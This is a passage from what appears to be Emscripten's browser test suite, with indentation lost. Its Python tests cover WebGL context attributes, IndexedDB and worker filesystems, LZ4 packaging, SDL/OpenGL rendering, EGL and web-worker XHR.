temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure', '1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', 0, args=['-s', 'ENVIRONMENT=web', '-Os', '--closure', '1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-s', 'EXIT_RUNTIME', '--shell-file', path_from_root('tests', 'test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
secret = str(time.time())
create_test_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_test_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME', '-s', 'ASYNCIFY']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']''', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = ['-s', 'ASYNCIFY', '-s', 'EXIT_RUNTIME']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_test_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_test_file('file1.txt', 'first')
ensure_dir('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_test_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([path_from_root('tests', 'fs', 'test_lz4fs.cpp'), '--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-s', 'MODULARIZE=1'])
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2', '--closure', '1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_test_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-s', 'ASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB', '-s', 'ASYNCIFY'])
def test_force_exit(self):
self.btest('force_exit.c', expected='17', args=['-s', 'EXIT_RUNTIME'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([path_from_root('tests', 'sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.compile_btest([path_from_root('tests', 'test_egl.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.compile_btest([path_from_root('tests', 'test_egl_width_height.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_test_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
self.compile_btest([path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
with open('test.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.o'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.o'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.o'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_test_file('script1.js', '''
Module._set(456);
''')
create_test_file('file1.txt', 'first')
create_test_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'EXIT_RUNTIME']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'AUTO_JS_LIBRARIES=0']
]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
